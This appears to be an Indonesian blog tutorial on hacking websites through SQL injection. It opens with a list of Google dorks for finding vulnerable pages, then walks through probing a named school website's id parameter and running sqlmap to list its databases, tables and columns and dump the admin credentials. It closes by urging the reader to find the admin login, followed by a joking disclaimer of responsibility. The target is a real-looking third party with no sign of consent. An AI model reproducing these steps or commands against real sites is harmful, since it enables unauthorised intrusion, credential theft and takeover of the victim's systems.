Disini, saya menggunakan Operating System (sistem Operasi) BackTrack 5 R3.
Pertama-tama, cari target yang vuln terhadap SQL Injection, berikut ini sedikit dork dari saya :
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:Pageid=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:Pageid=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
Dan masih banyak lagi dork
bertebaran di Google :D
Dalam Tutorial kali ini, saya akan menggunakan target salah satu Sekolah yang ada di Sidoarjo.
http://www.sman2sidoarjo.sch.id/
Untuk mengetahui Website tersebut Vuln atau tidak, silahkan tambahkan
tanda ‘ (petik satu) setelah atau sebelum nomor id tersebut, bisa juga dengan
menambahkan tanda - (minus) sebelum
nomor id tersebut.
Contoh : http://www.sman2sidoarjo.sch.id/beritaLengkap.php?id=5''
http://www.sman2sidoarjo.sch.id/beritaLengkap.php?id=’5
http://www.sman2sidoarjo.sch.id/beritaLengkap.php?id=-5
Jika target tersebut Vuln terhadap SQLi, maka akan muncul kira-kira
seperti ini :
Jika sudah mendapatkan target, silahkan buka Terminal, kemudian ketikan
perintah “cd /pentest/database/sqlmap” (tanpa tanda petik) kemudian Enter.
Kemudian akan muncul seperti ini.
Kemudian untuk mencari
nama database, ketikkan “ ./sqlmap.py -u http://www.sman2sidoarjo.sch.id/beritaLengkap.php?id=5 --dbs” (tanpa tanda
petik) kemudian Enter.
Kemudian akan muncul
seperti ini :
Disana kita dapat
menemukan 2 Database, yaitu information_schema dan sman2sidoarjo_sman2sda
Setelah kita
mendapatkan Database tersebut, kita tulis “./sqlmap.py -u http://www.sman2sidoarjo.sch.id/beritaLengkap.php?id=5 -D namadatabase --tables”
(tanpa tanda petik) kemudian Enter.
Setelah itu akan
muncul beberapa Tabel.
Kemudian kita mencari
Colums dengan cara mengetik “./sqlmap.py -u http://www.sman2sidoarjo.sch.id/beritaLengkap.php?id=5 -D namadatabase -T
namatable --columns” (tanpa tanda petik) kemudian Enter.
Disini kita akan
menjumpai beberapa Columns dari Tabel Admin.
Kemudian, untuk
mengetahui isi dari Columns tersebut, kita ketikkan “./sqlmap.py -u http://www.sman2sidoarjo.sch.id/beritaLengkap.php?id=5 -D namadatabase -T namatable --dump” (tanpa tanda petik)
kemudian Enter.
Jika sudah mendapatkan
User + Pass, pasti Anda tau kan yang harus dilakukan ? :)
Nah, tinggal cari
Login Adminnya deh :D
Admin Tidak bertanggung jawab atas apapun. :D
Admin Tidak bertanggung jawab atas apapun. :D
0 comments:
Post a Comment